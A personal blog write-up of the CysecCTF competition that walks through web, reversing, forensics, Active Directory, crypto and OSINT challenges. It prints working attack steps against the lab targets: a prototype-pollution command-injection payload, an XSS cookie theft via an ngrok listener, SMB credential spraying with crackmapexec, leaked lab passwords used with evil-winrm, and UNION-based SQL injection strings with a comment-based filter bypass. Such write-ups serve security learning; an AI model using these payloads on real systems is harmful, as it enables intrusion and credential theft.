root💀muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

A little words to keep us going XD

Do you have what it takes to beat the REST and be the BEST? 

image

Now that is a fun CTF challanges without wasting to much of a time so let jump in already to the fun part solving challanges we are starting with WEB category first.

Easy WEB – 500 Point

image

Now that we have the target URL let hit it.

image

Now that is a plain website quickly checking robots.txt and we have nothing we just got the same homepage back to us why not check the source for hint or way to move forrward.

image

Now that is interesting we can see the Add user with a comment but the most intersting one that caught my eyes was /api?id=source we all love API XD so let check it out.

image

That is a step forward let see what we have in the source code we just downloaded i will be using my terminal.

image

Let just get the flag already using Curl .

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ curl -X GET https://cysec-easy-web.herokuapp.com/api --data "id=gimme-flag"
{"message":"CYSEC{eazy_peasy_l3m0n_squeezy}"}                                                                                                                                                                       

Flag:- CYSEC{eazy_peasy_l3m0n_squeezy}

image

A fun one seems like we are stealing a cookie lol let hit the webpage to see what we have.

image

Seems we have a login page and register page and we have no valid credentials and it was stated already no brute forcing why not get our self a register account yes bro i mean let register XD.

image

Now that we have an account let log in.

image

In a dashboard hehehehehe don’t be happy yet it just the normal account i created and seems we have some interesting pages to explore.

image

The support page seems cool maybe XSS i just don’t know yet but let try using ngrok to see if we can get a hit back to the listener i set up.

image

Now back to fill the support page.

image

Let hit the Submit and wait for a hit back and boom i got a hit back but no cookie.

image

Now that is strange right let try using ngrok web interface which we can always access on http://localhost:4040 if you have ngrok running to inspect traffic.

image

Waiting for some min and boom we got the cookie now let go claim or flag.

cnVkZWZpc2g6REM4VG1zd1FldG5kZTlSUTZuNjdOS1hGdHg3VUFyTVFOelJ6SnA2ejQ0Z0NGcGpnNVVlRlJBNUN1Q2JWNnRHSHNKdlRk

image

Now we have our flag but am still curious to know what was encoded in the cookie.

image

Ahhhh you can’t guess that right.

A quick one seems nc can also get us the cookie.

image

Flag:- CYSEC{itz__easssssszzzzzzy0876#}

The Examiner – 1000 Point

image

Seems The Examiner web challange is hosted on THM platform let connect to our VPN to access it.

image

Deploying and we got our IP not going to waste to much time on using nmap to scan for full ports and we got one only which is port 5000 .

image

Boom and we landed on a port scanner page let see what we have on the source code.

image

Now that is the interesting part of the form let try intercepting our request using burp to undertand it more on how it works.

image

Intercepted and send to repeater now let play with it.

image

But i got Invalid IP format detected. i have no reason i keep swaping IP and Port but the same error now seems we already have the source code and our craft code i decided to change the Content-Type to application/json back in crafting our command.

image

Boom and we got it time to get a reverse shell back to our terminal.

image

Listener ready.

image

One liner reverse shell payload to execute ready also let hit and we should have a reverse shell back to our terminal.

image

Now spawning a full TTY shell to make our shell more stable and strong.

image

Now it ready time for more enumeration.

image

User Rudefish can run sudo let hit gtfobins.

image

Running that and we are root time to hunt for the flag.

image

Getting into root directory seems we have no flag in it but seems we have the .bash_history which store the history of a user command let see what we have in it.

image

image

We can see the flag being remove in the .bash_history i try using the find command to see if the flag is hidden elsewhere but no luck so let check what port is running locally.

image

Seems we have SSH port on which is cool seems we re root we can easily change any user password and have access to it also we can easily change to any user without a password which can be done with su sshuser .

image

Now we can easily generate a SSH private key for the user sshuser so we can easily access SSH with it.

image

ssh-keygen -t rsa

We have our private key and also added the authorized_keys now let try to access SSH.

image

Boom we have the flag and we are done.

Flag:- CYSEC{y0u_scaNNed_ME!}

Doctor Strange – 2000 Point

image

Man am tired jumping back in.

image

We have nothing on the source let check for robots.txt .

image

Ahhhh we have something on the robots.txt let check inpect.js .

image

const { exec } = require('child_process');

var setData = {
    isMalicious: true
};

const run = {
    runCommand: (req, res) => {
        if (!req.body.inspect) {
            return res.status(400).send("Bad request");
        } else {
            try {
                const data = JSON.parse(req.body.inspect);
                if (data.cmdToRun) {
                    const constructUserData = merge(setData, data);
                    if (setData.isMalicious === false) {
                        exec(`ping ${data.cmdToRun}`, (error, stdout, stderr) => {
                            if(error) {
                                return res.status(500).send(error.message)
                            } else if(stderr) {
                                return res.status(500).send(stderr.message);
                            } else {
                                return res.status(200).json(stdout)
                            }
                        });
                    } else {
                        exec(`ping 127.0.0.1`, (error, stdout, stderr) => {
                            if(error) {
                                return res.status(500).send(error.message)
                            } else if(stderr) {
                                return res.status(500).send(stderr.message);
                            } else {
                                return res.status(200).json({message: "Malicious code detected. This is all you get, you hacker", result: stdout})
                            }
                        });
                    }
                } else {
                    return res.status(400).send("What would you like to inspect today?");
                }
            } catch (e) {
                return res.status(400).send(e.message);
            }
        }
    }
};

module.exports = run;

const merge = (target, source) => {
    for(var attr in source) {
        if (typeof(target[attr]) === "object" && typeof(source[attr]) === "object") {
            merge(target[attr], source[attr]);
        } else {
            target[attr] = source[attr];
        }
    }
    return target;
};

Now that seems more like a javascript prototype pollution it kind of interesting seems we have to pollute setData object at the top here (line 3) to set it to false and POST request with the payload we got.

{"proto": {"isMalicious": false}, "cmdToRun":"<command_injection_payload>">}

Payload ready but seems we are missing the right endpoint let hit dirs brute forcing.

image

We found a login page but no creds to access it trying some default and sql injection payloads got no luck let check the source page.

image

Now that is a progress we know it send a POST request to /api/v1/login anytime we try to login seems like more API let try brute forcing the endpoint to avoid missing important part that can help us solve it.

Fire up burp suite and intercept the request changing the rquest method to POST since the API request on POST method now that is funny WTF am typing self XD send to intruder .

image

Now to payloads to select the wordlist seems medium.txt would work fine i guess.

image

Now hit on start attack we should get lot of 404 not found error but from my observation the valid dirs have 400 bad request .

image

image

A quick note we can also use ffuf i just love burp suite.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ ffuf -c -ic -r -u  http://34.205.69.93:8000/api/v1/FUZZ -X POST  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -mc 400

image

Now that is some useful endpoint let see if i can register an account. Luckily yes i was able to register an account but it was useless unable to get access to the login page with it some back to the inspect.js it should be possible we have inspect endpoint let confirm it.

image

Back to burp suite with the endpoint and our sweet payload we created.

{"proto": {"isMalicious": false}, "cmdToRun":"<command_injection_payload>"}

image

{"proto": {"isMalicious": false}, "cmdToRun":"127.0.0.1;id"}

Boom we have command injection.

image

We can also using curl.

image

Now let get our flag.

image

Done and dusted fun right.

Flag:- CYSEC{l3t_the_!njection5_r41n.}

Password Verifier – 500 Point

image

Now for the reversing part we have no time to waste on it.

image

Now a quick strings on it.

image

Now that is quick packed with upx we can easily get the real binary by unpacking it XD.

image

Now let grep the flag.

image

That was awesome bro and fast hey you reading you are doing well.

Flag:- CYSEC{easy_easy_easy_rev_rev_rev}

Encore – 500 Point

image

Forensics not my best part of the challanges i sucks on that part really but giving it my all so i download the jpeg file.

image

Nothing nothing bruhhhhhhhhh let strings it.

image

We have something binwalk should do the tricks.

image

Now that we have a zip file we can easily extract it but seems the same with the present dir we have already.

image

Interesting more like a stegsnow to me the space and the password is a hint i guess.

image

Let give it a try bruhhh.

image

Now that is strange but according to the Cysec Mod @Rudefish.

image

Ahhh which mean we are done since we have the Password already.

Ancient Languages – 300 Point

image

We have a wav file let download it to confirm.

image

Let try Morse Decoder on it first.

image

Wow that was fast right.

Flag: CYSEC{m0rse_is_0ld_really_0ld}

Happy Song – 1000 Point

image

Pretty sure not a morse lol why because i try it already no luck.

image

We always check with strings .

image

A hint maybe or not but am trying it.

image

I seriously have no idea of what am doing :sweat_smile: :sweat_smile: .

image

Here we go again with another hint. seems i will be using https://www.freephototool.com/ so i uploaded the raw file on it set up the width to 1588 and the height to 1570 and boom i got something reflected back.

image

Boom Boom and we got it.

image

Flag:- CYSEC{just_b3_HAPPY}

Keep It Simple, Stupid – 5000 Point

image

Bruhhh i so much love Pwn2Own eh B2R i always state it in all my write up we always start with what nmap enumeration is everything.

Note: You may need to add cysec.local to your hosts file

┌──(root💀Muzec-Security)-[/home/…/CTFPlayground/CysecCTF/cysec/nmap]
└─# echo "54.234.92.201 cysec.local" >> /etc/hosts      

Now for the nmap result.

# Nmap 7.91 scan initiated Fri May 13 08:18:52 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p25,445,587,80,3389,389 54.234.92.201
Nmap scan report for cysec.local (54.234.92.201)
Host is up (0.63s latency).

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp?
| fingerprint-strings: 
|   NULL: 
|_    421 Server busy, too many connections
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: IIS Windows Server
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
587/tcp  open  submission?
| fingerprint-strings: 
|   NULL: 
|_    421 Server busy, too many connections
|_smtp-commands: Couldn't establish connection on port 587
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CYSEC
|   NetBIOS_Domain_Name: CYSEC
|   NetBIOS_Computer_Name: EC2AMAZ-E36BFJ9
|   DNS_Domain_Name: cysec.local
|   DNS_Computer_Name: EC2AMAZ-E36BFJ9.cysec.local
|   DNS_Tree_Name: cysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-05-13T10:19:42+00:00
| ssl-cert: Subject: commonName=EC2AMAZ-E36BFJ9.cysec.local
| Not valid before: 2022-02-22T22:23:41
|_Not valid after:  2022-08-24T22:23:41
|_ssl-date: 2022-05-13T10:20:19+00:00; +2h59m55s from scanner time.
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25-TCP:V=7.91%I=7%D=5/13%Time=627E0661%P=x86_64-pc-linux-gnu%r(NULL
SF:,27,"421\x20Server\x20busy,\x20too\x20many\x20connections\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port587-TCP:V=7.91%I=7%D=5/13%Time=627E0661%P=x86_64-pc-linux-gnu%r(NUL
SF:L,27,"421\x20Server\x20busy,\x20too\x20many\x20connections\r\n");
Service Info: Host: EC2AMAZ-E36BFJ9; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h59m54s, deviation: 0s, median: 2h59m54s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-05-13T10:19:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 13 08:22:35 2022 -- 1 IP address (1 host up) scanned in 222.69 seconds

Cutting down to the chase already you can check my past write up if you are still lost on how i got the Ports. Now seems we have SMB always go for the low hanging fruit first.

┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ smbclient -L //54.234.92.201/ -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]

Seems we have no shares yet possible we need a creds but seems we have HTTP port open let see what we have on the page.

image

Windows yes bruhh i think you notice already from the nmap scan gosh don’t look down on yourself man you are cool and l33t XD now back to what we are doing seems we have nothing yet on the page brute forcing for hidden dirs and subdomain would be the next step right now let hit it.

┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.cysec.local" -u http://cysec.local

Now that is to Fuzz for sub-domain way fast and we found something.

image

Now you already know what to do right add secret.cysec.local to your /etc/hosts file again.

image

Just like that let see what we have when we access it.

image

Now seems we have nothing even after checking the source page let FUZZ the endpoint.

┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/cysec/nmap]
└─$ ffuf -c -ic -r -u  http://secret.cysec.local/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

A quick note we can always add to check for extension with the switch -e txt,php,phtml,bak,old incase to avoid missing some goodies at time.

image

Now that look promising the Backups.

image

Now that is a lead forward we have wordlists for both users and passwords .

jhammond
ippsec
pcyber
jmorgan
jsmith
sliberty
eyeager
jbiden

Man i can’t paste the passwords list here it to long i decided to brute force SMB with the wordlists i got using cme you have no idea what is that right it crackmapexec .

crackmapexec smb cysec.local -u users.txt -p passwords.txt

Let it fly and wait wait wait XD.

image

Now we have creds for SMB let confirm it.

[+] cysec.local\jsmith:Password@123

image

Shares shares loot loot hehehehehehehe we all love that right now let loot some stuffs first share on my mind is confidential let see what we can loot.

image

Now that is strange the first time i work on the machine i only found one file which is Email.txt guess it for one of the player so i downloaded Email.txt .

image

Now let cat it.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ cat Email.txt                                          
From HR Manager <hlevi@cysec.local>,

Good day everyone, I hope this email meets you well.

Due to the amount of delay we encountered during the last self-appraisal week, one of the the IT team members, John Smith, has decide to automate the process. Things should do smoother now.

Thank you and enjoy the rest of your day.

- To all employess.                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]

Seems it pointing us to jsmith home dirs or should i just call it desktop seems we are working on windows machine XD. Now back to the shares.

image

Now moving to jsmith home desktop hehehehe it sound lame.

image

Guess that is what we need let download it.

image

Now that is a strong password for user hlevi now time to take it to the next level. Let try to scan if we have winrm port open.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ nmap -sC -sV -p 5985 cysec.local           
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-16 11:01 WAT
Nmap scan report for cysec.local (54.234.92.201)
Host is up (0.25s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.32 seconds

Now that is confirm we can use the evil-winrm to access the machine with the creds we just got.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF/cysec]
└─$ evil-winrm -i cysec.local  -u hlevi -p SuperDuperSecurePassword1!

Boom we should be in 3 2 1 .

image

Now that we are in let to enumerate about our present user hlevi what group is he on maybe any hidden comments.

net users hlevi

image

Now that look like a password and we still have a user which we are still missing a creds for i guess let try confirming it with cme possible it a jackpot .

image

Boom that is a big catch let try accessing it with evil-winrm .

image

We are in and seems our user is in the domain admin group which is a big catch really.

image

We should be able to access the adminisrator desktop now to get the flag.

image

Now that is done we have the flag but man am still not happy with that let get access to the administrator account. Let use secretsdump.py to get the the administrator hashes now use PTH to get access to it using evil-winrm .

image

But when i try it no luck guess only eyeager with the password is the way.

Flag:- CYSEC{itz_all_n1ce&34sy}

IAmBot – 2000 Point

image

Telegram bot cool let hit it.

image

Seems we can register and login but we have no creds let register first to know more about what we are dealing with.

image

I aready have an account let just log in.

image

Now that is a jwt token let try checking our profile.

image

Hmmm nothing not that useful let try some injection on the login command.

image

Dead end to me ahhhh let check some of the commands.

image

Let try the forgotPassword command with some simple sql injection payloads.

image

That look strange and kind of interesting getting the alert Hacking attempted detected. This information has been logged and reported to our security team. is it possible it vulnerable to sql injection.

image

Now that is a error i love seeing. Let dig more and see what we can get.

image

I was able to get all users username and hashes but not that useful now i think it time to enumerate the number of columns first to avoid being detected there is an easy bypass, which is to replace all whitespaces with /**/ (comments).

image

/forgotPassword admin'/**/UNION/**/SELECT/**/1# test

image

/forgotPassword admin'/**/UNION/**/SELECT/**/1,2# test

image

/forgotPassword admin'/**/UNION/**/SELECT/**/1,2,3# test

Hehehehe no error seems we found the numbers of columns which is 3 now that a lead to move forward. Let confirm the version.

image

/forgotPassword admin'/**/UNION/**/SELECT/**/@@version,2,3# test

Now let get the database and tables, columns so we can dump everything.

image

Database command;-

/forgotPassword admin'/**/UNION/**/SELECT/**/concat(schema_name),2,3/**/FROM/**/information_schema.schemata# test

image

Tables command;-

/forgotPassword admin'/**/UNION/**/SELECT/**/concat(table_name),2,3/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema='chatbot'# test

image

Columns command;-

/forgotPassword admin'/**/UNION/**/SELECT/**/concat(column_name,","),2,3/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='users'# test

Now for the fun part time to dump all XD.

image

/forgotPassword admin'/**/UNION/**/SELECT/**/id,username,password/**/FROM/**/chatbot.users/**/LIMIT/**/2# test

Now that settle it we are done.

Flag: CYSEC{sQLi_1s_everyWHERe!}

Hacker Wordle – 2000 Point

image

Now that would be cool challenge so i download the files but without going to far i got into a issue some missing python modules was missing on my target which required us to download and install python 3.8 now without wasting to much of time we can do all that with the commands below.

wget https://www.python.org/ftp/python/3.8.13/Python-3.8.13.tar.xz

Now just relax we are installing it manually now that we have the archive file let extract it.

tar -xf Python-3.8.13.tar.xz

We should have the archive extracted already in a folder now we can move it.

sudo mv Python-3.8.13 /opt/

Installing all the dependencies required to install Python 3.8. .

sudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libsqlite3-dev libreadline-dev libffi-dev curl libbz2-dev pkg-config make -y

Now let give it time.

cd /opt/Python-3.8.13/

We should run the command below to check if all dependencies are present on our system.

./configure --enable-optimizations --enable-shared

It will optimize the Python binary by running multiple tests now that we have built and configured the environment, it is time to compile it with the command make.

make

Once we have finished building, let install Python binaries as follows:

sudo make altinstall

A quick notice it is advised to use the make altinstall command NOT to overwrite the default Python 3 binary system. after the installation is done we need to configure the dynamic linker run time binding with ldconfig command.

sudo ldconfig /opt/Python-3.8.13

Now let confirm if we have everything ready.

image

Now installing requirement for the wordle file.

image

wget https://bootstrap.pypa.io/get-pip.py

Next, install the file downloaded.

python3.8 get-pip.py

Once installed, it is a good idea to check for upgrades.

python3.8 -m pip install --upgrade pip

Checking if pip3.8 was installed.

image

Now for the requirement.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ cat requirements.txt       
coloroma
random  

Can easily use pip3.8 install -r requirements.txt to do that now let run the wordle file.

image

When i strings it i got nothing so i decided to play with it.

image

Oh only five words cool let play with it.

image

Boom we got it not going to lie am just guessing here that all.

Flag:- CYSEC{what_a_game_of_wordle!}

Back to Base – 100 Point

image

Most of the crypto was solve by my litle bro @Abzee you can easily reach him on twitter Abzee now Abzee would be walking you guys through the crypto challenges.

We are using cybechef .

image

From base64 ---> Reverse 

We have the flag.

Flag:- CYSEC{B4se-LXIV}

Still on Bases – 100 Point

image

Now that look like base32 let give it a try using cyberchef also.

image

From base32 ---> Reverse

Flag:- CYSEC{B4se-XXXII}

Bella Crypter – 300 Point

image

Trying it with john the ripper was so slow.

image

But seems we can see the hash type let try using hashcat which will be more faster.

image

Setting it up with hashcat .

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt                                                                                                        139 ⨯
hashcat (v6.1.1) starting...

It should take time like time time and boom we should have the cracked hash.

image

But luckily have done it.

Flag:- CYSEC{bleh}

John Morrison – 500 Point

image

Let download it.

image

Seems like a strange one.

image

We are done.

Flag:- CYSEC-67890-JEDHB29UEYO02UEDDJPH

Squished Silence – 1500 Point

image

I guess minuscule letters are cute, but now i can’t make sense of this beautiful mess. help me decode it. Looking up minuscule means uppercase and lowercase which is interesting i guess.

┌──(muzec㉿Muzec-Security)-[~/Desktop/CTFPlayground/CysecCTF]
└─$ cat rubik.txt       
y3llc2vje2nyexrvz3jhcgh5x2nhbl9izv90aglzx2nyyxp5fq==

Let try decoding it online.

image

By changing it we are getting some interesting stuff hehehehe don’t mind @Abzee using phone to solve challenges l33t right.

image

As you can see we have gotten cyesec{cryptography We need to continue changing it to upper and lower case till we got the right flag.

image

Bingo and we have our flag by changing d base64 strings upper and lowercase and a little notice seems the flag format was different pretty sure error from there end.

Flag:- Cyesec{crytography_can_be_this_crazy}

Hackerman – 2000 Point

image

We’ve recently received reports of a script kiddie who goes by the name detrix01 who goes around hacking into social media accounts using basic techinques. he picks motivation from another hacker. help us find him or them, get us the flag and the predicted country of residence of the hacker.

Open-source intelligence (OSINT) calm down bruh calm down i will be using my best tools Sherlock to Hunt down social media accounts by username across social networks which seems cool with out wasting to much of time let hit it.

┌──(muzec㉿Muzec-Security)-[~/…/CTFPlayground/CysecCTF/sherlock/sherlock]
└─$ python3 sherlock.py detrix01         
[*] Checking username detrix01 on:


[+] 9GAG: https://www.9gag.com/u/detrix01
[+] AllMyLinks: https://allmylinks.com/detrix01
[+] CNET: https://www.cnet.com/profiles/detrix01/
[+] FortniteTracker: https://fortnitetracker.com/profile/all/detrix01
[+] ICQ: https://icq.im/detrix01/en
[+] Kongregate: https://www.kongregate.com/accounts/detrix01
[+] PCGamer: https://forums.pcgamer.com/members/?username=detrix01
[+] Pinterest: https://www.pinterest.com/detrix01/
[+] Reddit: https://www.reddit.com/user/detrix01
[+] Roblox: https://www.roblox.com/user.aspx?username=detrix01

Now that is a headstart going through all links and we found just one interesting one.

image

A hint i guess let run sherlock on it also to avoid missing anything.

image

Now going through all links and https://disqus.com/Albhda stand out let see what we have on the page.

image

Damn! a version of me from the past was careless.. But who's good with time travel? "Flag is 404" 

That is a lead i decided to check it on way back machine .

image

image

Hehehehehe awesome let go through some snapshot save bu the way back machine .

image

Rule 1: no system is safe CYSEC-NG{T1m3-Tr4vle-sur3-Rocks} 

Now that was fast seems we are just missing the country only pain pain google searching Albhda and got some result.

image

I spend time trying italy,rome and bla bla bla but trying latin and boom i got it but does not seems right to me is latin a country XD .

Flag:- CYSEC-NG{T1m3-Tr4vle-sur3-Rocks_Latin}

Bruhhhhh i guess i should stop here XD.

Greeting From Muzec



Back To Home